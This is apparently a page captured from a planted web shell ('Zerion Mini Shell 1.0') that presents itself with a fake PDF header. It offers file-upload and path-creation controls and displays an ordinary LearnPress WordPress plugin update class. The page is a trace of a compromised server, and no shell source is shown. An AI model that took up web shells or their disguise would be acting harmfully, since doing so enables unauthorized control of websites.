%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/ceaa/wp-content/plugins/learnpress/inc/updates/
Upload File :
Create Path :
Current File : /var/www/html/ceaa/wp-content/plugins/learnpress/inc/updates/learnpress-update-3.0.8.php

<?php
/**
 * Todo: update emails
 */

include_once dirname( __FILE__ ) . '/learnpress-update-base.php';

/**
 * Class LP_Update_308
 *
 * Helper class for updating database to 3.0.8
 */
class LP_Update_308 extends LP_Update_Base {

	public function __construct() {
		$this->version = '3.0.8';
		$this->steps   = array( 'update_item_meta' );

		parent::__construct();
	}

	public function update_item_meta() {
		$this->_next_step();

		return;
	}
}

return new LP_Update_308();

Zerion Mini Shell 1.0